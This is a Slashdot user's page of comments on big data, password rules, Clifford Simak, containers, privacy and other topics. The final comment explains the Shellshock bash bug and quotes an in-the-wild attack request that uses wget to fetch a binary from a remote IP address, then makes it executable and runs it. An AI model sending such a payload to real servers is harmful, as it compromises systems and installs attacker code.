Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror

Comment Not all data is useful (Score 1) 142 142

The new glorious world of big data and data analytics has one small problem. Just because you have a ton of data doesn't mean that there is any useful information in it. Really, what are companies going to be able to glean from such a database? That some peoples heart rate goes up when they drive? Which means what?

Insurance companies are the original big data users. Actuarial science is all based on the premise that it is possible to predict the likely outcome for an individual through the statistical analysis of the larger group. They have been doing this quite successfully/profitably since the 1700's. There is a definite point of diminishing return between increased revenue by identifying higher risk individuals and the costs associated with implementing those programs. If it costs $1 million to implement you would need to identify 10,000 people and charge them an extra $100 just to break even. If they can find a competitor whose rate is less than that $100 increase and leave then you start losing money, and not just the $100 but the original premium as well.

A lot of people are under the misconception that all they need to do is gather data and they will then be able to sell it. But the data has to be useful and I just don't see it in this case.

Submission + - What is keeping you out of IT Security?

xanthos writes: Demand for cybersecurity professionals over the past five years grew 3.5 times faster than demand for other IT jobs and about 12 times faster than for all other jobs, according to a March 2014 report by Burning Glass Technologies.

The types of jobs in the field are numerous and range from entry level analysts who monitor intrusion detection systems, security engineers and architects who design and build out various security technologies, risk and compliance analysts, pen testers, malware reversal analysts and IT Security management.

With all these jobs paying above average and many over $100K, what is keeping you from taking your admin, networking, developer experience and moving to information security?

Comment And the point of the study is what? (Score 1) 159 159

Single factor authentication (ie password) is a people problem. If access to a site is granted by matching an identifier with one other piece of information, then it is the risk created by the compromise of those credentials that should govern how "strong" those credentials need to be.

Financial information? Strong. Personal Health information? Strong. Email? Depends on how interesting you are. Hardware store loyalty points? Meh.

The more important point from the article is this:
"In fact, research from Microsoft/University of California at Berkeley/University of British Columbia (paper titled Does My Password Go Up to Eleven? The Impact of Password Meters on Password Selection) found that indeed, password gauges do encourage users to concoct stronger passwords."

Warn/shame people that their passwords suck and they are likely to do better.

(And interestingly enough, mathematically a site that insists on an 8 character password with at least one each of upper/lower case letters, numbers and special characters produces less secure passwords than a site that insists on 8 characters that can be any of those.)

Comment And if you haven't read Simak (Score 4, Informative) 104 104

If you are unfamiliar with the work of Clifford Simak I strongly suggest that you give him a try. What I have always loved is that there is so much that is just unknown going on in his stories. No great hero's, no great battles, just a lot of "what the hell is going on here?"

His last book "Highway of Eternity" is great and "Ring around the Sun" has always been a favorite as well. Most of his stuff is a short quick read abd us easily found in your favorite used book store (you do have one I hope).

At a minimum read the novel synopsis over at Wikipedia to get a glimpse of a very interesting author.

Comment A number of free options at Turnkey Linux (Score 1) 343 343

A great resource for situations like this is Turnkey Linux (http://www.turnkeylinux.org). They host a wide variety of fully built server images that make it easy to try out a number of systems to see what best fits your need. You can download and fire up well known CMS like Drupal or plone and see if they fit the need or not. Then if there is something they like they can load the iso on a bare metal box and go.

Comment On the Internet, no one knows that you are a dog (Score 1) 62 62

Really people? Your lives are so fascinating that you need to keep the details away from the digital paparazzi? Mine sure isn't.

Here is my take on what is going on here. First, the government doesn't care. Have you heard about the huge number of people arrested for having pictures on Facebook showing drug use? No? Well that is because it's not a threat to the greater good and not worth the time and effort to prosecute. Not even a cursory email saying to clean up your act or we will send you a more strongly worded email. Many of us may have dissident thoughts but we don't do dissident acts and are mostly harmless. So that leaves the Big Business boogie man with a financial motive. In the beginning there was the trifecta of terror, the credit rating agencies. They, with their magical patented Fair Issac scoring formula, have claimed for years that those numbers offer a glimpse into a persons soul. And they basically market it as such even when the intended use is based more on correlation than causation. As evidence I present the recent use of credit scores by insurance companies. My credit score has never been affected by my driving history, so why should my car insurance rates be based on my credit score? In my case I was given the option of allowing it or not. Allowing it could have saved me as much as 3%!, or cost me more, in any case the amount did not benefit me enough to make it worth my while. Same with the followup offer to install their OBD digital spy.

There are a bunch of people who think they can make a fortune collecting other peoples data. Reality is that most of that data is mundane garbage that has very little value to it. Much like the millions and millions of credit card numbers that have been compromised. Collecting the information is easy, monetizing it is hard.

Comment Have we come full circle? (Score 1) 71 71

I can't shake the feeling that I've seen this movie before, I think it was called "statically linked executables" where all the code needed to run the application resided in one place. Then as the executables got more complex they got much larger, consumed more resources, and large parts of each executable was redundant with each other. Hence static executables were superceded by "dynamically linked executables" which pulled out the redundancies into general purpose libraries that existed in only one place which led to dll version hell. So now we have containers which allows an application to be bundled up with just the code it needs to execute.

And yes, containers have more capabilities than simply isolating the code. However I would argue that code isolation is the primary use of containers.

I have a prediction, that by the end of 2015 we will see one of the container vendors offer a version that allows for "code sharing" between a master image and the individual containers in order to cut down on redundancy. Full Circle++.

Comment Beware of the Dark Side! (Score 1) 320 320

Luke: Is the dark side stronger?
Yoda: No, no, no. Quicker, easier, more seductive.

In so many subject areas you have the option of the quick and easy way or the more thorough slog through the fundamentals. Unfortunately, when you are young, the long term advantages of mastering the fundamentals is lost when compared to the short term gratification of getting an assignment done.

There have been many discussions here on Slashdot regarding the issues caused by people who do not understand the fundamentals of their jobs. Coders who cannot code efficiently because they do not understand what makes code inefficient or efficient or how to test for potential improvements. Personally I am aghast at the number of web developers I have run into who are clueless when it comes to networking. Since they have libraries and frameworks for that they don't feel the need to personally understand it. Don't even get me started on the horrible, horrible SQL queries I have seen. There is only so much optimization that can be done on the backend by the optimizing routines written by people who do know the fundamentals.

In the end, too many students seem to not understand the purpose of an "Education" and have confused it with its simpler cousin, "Job training".

Comment So the REAL problem is ... (Score 1) 429 429

1) ignorant bit torrent user who doesn't know how to configure their software to play nice in public
2) ignorant free wifi supplier who doesn't know how to configure their router for QOS
3) ignorant noob who relies on there being free wifi in order to do his job

There is a reason I've used this sig for years.

Comment Will there be roundabouts? (Score 1) 86 86

I was in Carmel Indiana, a northern Indianapolis suburb, last week. Since the 1990's they have been replacing all of the main intersections with roundabouts. They have over 60 of them now.

While roundabouts have been proven to be safer for average drivers, how easy are they for autonomous vehicles to navigate vs your standard intersection? Is a roundabout an asset to the adoption of autonomous vehicles, a hinderance or a wash?

Comment Yes it is being exploited (Score 5, Informative) 318 318

There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.

The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.

An example attack:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;

Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.

Genius is ten percent inspiration and fifty percent capital gains.

Working...